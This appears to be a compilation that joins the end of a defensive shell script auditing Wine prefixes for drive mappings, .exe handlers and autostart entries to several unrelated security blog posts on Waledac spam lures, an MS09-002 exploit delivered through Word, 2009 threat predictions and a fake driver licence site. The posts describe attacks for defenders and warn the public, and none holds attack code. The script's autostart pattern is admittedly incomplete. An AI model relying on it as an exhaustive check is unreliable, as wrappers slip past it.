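AUTOSTART_DIR="${XDG_CONFIG_HOME:-$HOME/.config}/autostart"

# Mitigation 1: Wine must never run as root.
running_as_root() {
    [ "$(id -u)" -eq 0 ]
}

# Mitigation 2: every symlink in dosdevices other than c: hands Windows
# code a path to the host filesystem (z: -> /) or to a mounted CD-ROM or
# USB key, which is exactly what the USB-spreading sample needs.
# Prints one "link -> target" line per exposed mapping.
list_exposed_mappings() {               # $1 = dosdevices directory
    dir="$1"
    [ -d "$dir" ] || return 0
    for link in "$dir"/*; do
        [ -L "$link" ] || continue
        case "${link##*/}" in c:) continue ;; esac   # keep drive_c
        printf '%s -> %s\n' "${link##*/}" "$(readlink "$link")"
    done
}

# Removes the mappings list_exposed_mappings reports; prints how many.
prune_dosdevices() {                    # $1 = dosdevices directory
    dir="$1"
    removed=0
    [ -d "$dir" ] || { echo 0; return 0; }
    for link in "$dir"/*; do
        [ -L "$link" ] || continue
        case "${link##*/}" in c:) continue ;; esac
        rm -f "$link" && removed=$((removed + 1))
    done
    echo "$removed"
}

# Mitigation 3: report which application the desktop opens .exe files
# with; a handler containing "wine" means a double-click runs the file.
exe_handler() {                         # prints "mimetype: handler"
    command -v xdg-mime >/dev/null 2>&1 || { echo "xdg-mime not installed"; return 0; }
    for mt in application/x-ms-dos-executable application/x-msdownload; do
        printf '%s: %s\n' "$mt" "$(xdg-mime query default "$mt" 2>/dev/null)"
    done
}

# Autostart check: the Linux-side persistence described earlier is a
# .desktop file whose Exec= line launches wine or a .exe.  Prints the
# matching files, one per line (nothing if there are none).
find_wine_autostart() {                 # $1 = XDG autostart directory
    dir="$1"
    [ -d "$dir" ] || return 0
    grep -il -E '^Exec=.*(wine|\.exe)' "$dir"/*.desktop 2>/dev/null || :
    return 0
}

main() {
    if running_as_root; then
        echo "WARNING: running as root; never run Wine as root"
    fi
    echo "Drive mappings other than c: in $WINEPREFIX/dosdevices:"
    list_exposed_mappings "$WINEPREFIX/dosdevices"
    if [ "${1:-}" = "--prune" ]; then
        echo "Removed $(prune_dosdevices "$WINEPREFIX/dosdevices") mapping(s)"
    fi
    echo "Handler for Windows executables:"
    exe_handler
    echo "Autostart entries launching wine or a .exe:"
    find_wine_autostart "$AUTOSTART_DIR"
    return 0
}

main "$@"
```

    Run it as the ordinary user who owns the prefix; running it as root would defeat the first check. The autostart scan only catches entries that name wine or a .exe on the Exec= line, so a wrapper script that launches Wine indirectly would slip past it; the drive-mapping check, by contrast, is exhaustive because Wine has no other way to reach host paths.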

    Malware Riding on the Tides of the Economic Crisis

    A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys want to fool exactly those people who are trying to save money these days. Spam mails promoting bargains that supposedly help during the recession are hitting inboxes right now.

    When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

    After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

    In economically hard times, the malware authors do not rely on clever and timely social engineering alone: they also include a malicious IFRAME in the website that pulls in exploit code and attempts a drive-by infection of unpatched computers. Furthermore, the website is craftily designed. The bad guys use geo-location services to better target their audience: when someone connects to the website, it resolves the visitor’s location on the fly and inserts that city and country into the page text. A victim who sees coupons for his own town is that much more likely to download the bargain list.

    As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

    MS09-002 Exploit in the wild uses MSWord Lure

    An exploit targeting a recently patched vulnerability in Internet Explorer 7 has been discovered in the wild. Malware crooks were quick to develop a working exploit for the vulnerability (CVE-2009-0075), which was fixed in the February Microsoft patch release, MS09-002. Microsoft rated the vulnerability critical and judged that consistent exploit code was likely. The modus operandi closely resembles the zero-day attack using Word documents that we blogged about in December 2008.

    The attack is delivered as a maliciously crafted Word document sent to unsuspecting users. The document contains an embedded ActiveX control which, when the document is opened, connects to a website hosting the MS09-002 exploit and launches it against the browser.

    Malware authors are always working on new ways to evade detection and control compromised machines. This time they added a layer of obfuscation (base64 encoding), probably to hinder easy analysis and signature-based detection. Base64 is an encoding, not encryption, so decoding the payload is the first step of analysis rather than an obstacle to it.

    For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It is just a matter of time before variants of this exploit circulate in the wild and are incorporated into the various do-it-yourself web attack toolkits.

    The malicious Word document is detected with the current DATs as Exploit-MSWord.k, and the Internet Explorer 7 exploit as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

    New Valentine Scam on the Loose

    Following last week’s warning about possible scams related to the approaching Valentine’s Day, it’s no surprise that today we’ve seen another new Valentine theme, hosted on the fast-fluxing Waledac botnet. If a user were to follow the link in these spam emails (and please don’t do that!), a web site like the following would appear:

    A picture of two adorable Shih Tzu puppies wishes you a Happy Valentine’s Day. The text of the lure advertises a “Valentine Devkit” named loveexe.exe or start.exe. Regular readers can guess it already: this is a social-engineering trick to convince users to download the real threat. Don’t click the link to the executable or you will end up with malware.

    A close look at the website’s source code does not currently reveal any additional drive-by infections or downloads (but that can change quickly), as seen in past Waledac (or “Storm”) themes. This particular variant is covered in the 5522 DATs and is also blocked by Artemis and at the (former Secure) Web Gateway.

    Cybercrime, Online Threats, and the Recession

    As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

    A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

    Our Main Threat Predictions/Trends for 2009:

    • Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

    • Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

    • Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

    • Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

    • Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the identity checks involved in registering a domain name. This gives spammers the opportunity to run their underground business with minimal expense. Spam linking to these do-it-yourself hosting providers reaches its destination far more often than spam linking to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and with the new restrictions on short-term domain tasting, the free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

    • More Targeted Phishing and Corporate Blackmailing. Botnets (networks of zombie computers) that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

    • Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

    • Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

    • An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

    • More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

    • Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

    • McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

    • New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

    In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

    Fake Licenses on the Rise

    Since at least the year 2000, email scams selling International Driver Licenses have circulated around the net. Their authors claim that with these documents buyers can avoid paying traffic tickets and establish new identities for hotel check-ins or entry to bars (if the buyers are underage). Lately these offers have become more elaborate.

    Yesterday, I came across such an ad; it was in French and promoted a site offering a replacement driver license in place of a regular one:

    Because of its name (backdoordl), the website aroused my curiosity. I followed the link and, one thing leading to another, discovered the extent of this fraud.

    At backdoordl, I found a professional website divided into three areas: French, German and English.

    In the UK area, I recognized text that was similar to what I first saw in French:

    Have you lost your existing licence? No problem! Can’t remember the details? No problem! Need a clean licence? No problem! Need motorcycle, car, bus, hgv entitlement? No problem! Over 65? No problem! Medical problems? No problem!

    There are 110 models of drivers licences in current use throughout the European Union, that’s not to mention drivers licences issued outside of the EU that are still accepted for exchange in different EU countries. This service is directed at any resident or non-resident of the United Kingdom or EU that wishes to obtain a full driving licence without any tests. So no matter what country you are a resident or citizen of, they claim they can help. Even if you live outside of the UK or EU! Once you have a driving licence through them, you can exchange it in your own country for a local licence. EU driving licences are accepted ‘as is’ worldwide for driving and exchange. It does not matter what nationality you are!

    The office address, undoubtedly fake, on the contact page was in the UK. There was no phone number; they said one would be provided only to clients who ordered. Despite some inconsistencies here and there, it was also stated that the company did not accept postal contact. Because a photo and signature were needed to create the new driving licence, the buyer had to scan them and send them by email.

    The registrar was ENOM Inc., and the registration details were protected by the “WhoisGuard” service, masking the true identity of the domain-name registrant and keeping it out of any public WHOIS database.

    Getting on with my searches, I discovered the backdoordl site was not unique. Almost half a dozen nearly exact copies were also easily available online:

    Domain registrants